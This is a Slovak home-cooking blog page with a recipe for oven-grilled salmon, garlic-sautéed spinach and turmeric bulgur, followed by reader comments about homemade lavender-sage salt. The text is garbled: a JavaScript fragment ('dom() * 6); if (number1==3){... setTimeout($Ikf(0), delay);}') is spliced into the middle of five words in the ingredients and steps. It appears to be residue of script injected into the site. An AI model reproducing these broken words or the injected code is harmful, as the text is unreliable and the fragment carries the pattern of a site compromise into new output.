Losos s levtom na cesnaku a bulgurom

Dnes to bude rýchla večera, za ktorú ma môj manžel, aj dcérka milujú ešte o kúsok viac. Síce mladá dáma má fázu sabotovania špenátu, rybku môže od malinka na všetky možné spôsoby. Veľmi fajn na tomto jedle je, že je expresne rýchlo hotové a chutí ako z najlepšej reštaurácie. Tak poďme na to!

Ingrediencie

  • 4 porcie lososa, najlepšie z lovu, alebo kvalitnej farmy (veľkosť porcií nechám na vás)
  • levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľovo-šalviová soľ
  • olivový olej, alebo ghee maslo
  • 2 vrecúška čerstvého baby španátu v zime a v lete zo záhradky, ak máte tú možnosť také 3-4 veľké hrste
  • 4 strúčiky cesnaku
  • soľ
  • korenie
  • 1 pl olivového oleja
  • 200 g bulguru
  • 500 ml vody
  • 1 pl olivového oleja alebo ghee masla
  • 1/2 čl soli
  • 1/2 kl mletej kurkumy
  • hrsť nasekanej čerstvej vňate koriandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra
  • citrón

Postup

  1. Lososa poriadne umyjeme, osušíme a odstránime kožu. Z oboch strán ho potrieme olivovým olejom a posypeme levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľovo-šalviovým korením a prípadne dosolíme podľa chuti. Položíme do pekáča na pečiaci papier a dáme do studenej rúry. Zapneme gril na 250 stupňov a stopneme si 15-20 minút. každá rúra pečie inak a každý má rád inak prepečeného lososa. Ja nemám rada, keď je v strede surový, takže ho nechám 20 minút a prepečie sa úplne. Ak ste v rúre predtým piekli napríklad koláč a rúru máte teplú, tak ju nechajte zohriať na 200 stupňov a pečte tiež 15-20 minút, ale už pri tých 200 stupňoch.
  2. Ak máte deti menšie, alebo deti do roka a pol, alebo im nechcete dávať pečené mäso ani v staršom veku, vhodnejšie je, aby ste ju urobili na pare. Filet vložíte do parného hrnca, položíte naň plátok masla a 20 minút, až pol hodinku ho paríte, kým nie je úplne hotový.
  3. Poďme si pripraviť špenát. Je vynikajúcim zdrojom vápnika, železa, ale obsahuje aj veľa kyseliny šťavelovej, ktorá zabraňuje vstrebávaniu vápnika. Preto je špenát vhodnejšie upraviť tepelne, kedy sa odstráni kyselina šťavelová a vápniku ani železu teplota neublíži. Železa ale vraj neobsahuje až tak veľa, ako sa doteraz myslelo, vraj išlo o matematickú chybu v desatinnej čiarke. Špenát je treba vyzdvinúť hlavne kvôli vysokému obsahu vápnika a kyseliny listovej.
  4. Špenát poriadne umyjeme, môžeme ho pokrájať, alebo nechať celý. Na 1 pl olivového oleja minútku speníme na kolieska nakrájaný cesnak (ten odporúčam nakrájať aspoň 5-10 minút pred tepelným ohrevom, aby mohli enzýmy vykonať svoju prácu ešte predtým, ako ich teplom zničíme 😉 ).  Pridáme špenát a na strednej teplote ho krátko restujeme. Len toľko, aby zmenšil svoj objem. Posolíme ho, pokoreníme, zakryjeme pokrievkou a odstavíme  z varnej dosky.
  5. Zarovno so špenátom si stíhame pripraviť aj bulgur. Na 1 pl olivového oleja krátko orestujeme bulgur s kurkumou. Podobne ako tarhoňu. Posolíme, zalejeme vriacou vodou, stíšime plameň a za jemného bublania pod pokrievkou varíme 5 minút, odstavíme z varnej dosky a necháme ešte pod pokrievkou odpočívať, kým nevsiakne všetka voda. Nasekáme si čerstvú vňať koriandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra, v prípade, že vám chutí, ak nie, tak to nesilte. My sme doma rozdelení na dva tabory. Manželovi koriandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander nechutí a ja ho milujem, tak robievam dve verzie. V každom prípade, ale aj tú nekoriandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}androvú verziu pokropte citrónovou šťavou a premiešajte. Bulgur je výživná a ľahká forma pšenice, ktorá podporí trávenie, ale aj chudnutie. Má nízky glykemický index a teda vám po ňom neskáče v krvi cukor a inzulín ako na húsenkovej dráhe.
  6. Medzitým ako sme pripravovali španát a bulgur, nám pípne rúra, že už je hotovo, tak si môžme všetko naložiť na tanier a vychutnať si zdravé a ľahké jedlo, ktoré nás nielen zasýti, je rýchle a chutné, ale zároveň naše telo nabombuje živinami a zdravými tukmi 😀

Dobrú chuť všetkým za stolom želám 😀

Ohodnoť Recept

3 komentáre

  1. Mňaaam ?
    Mila Miriam, chcem sa Vás opýtať na soľ levanduľovo-šalviovú – vyrábate si ju sama ? 🙂 ak ano nebol by receptík? ?

     
    • Ano, ZUzka, sama si ju vyrabam 🙂 POl na pol sušene kvety levandule a sušenej šalvie v maziariku rozmaziarikovat s rovnakym mnozstvom hrubozrnnej soli. Odlozit do poharika a pouzivat 😀

       
  2. Ďakujem pekne ?

     

Napíš Koment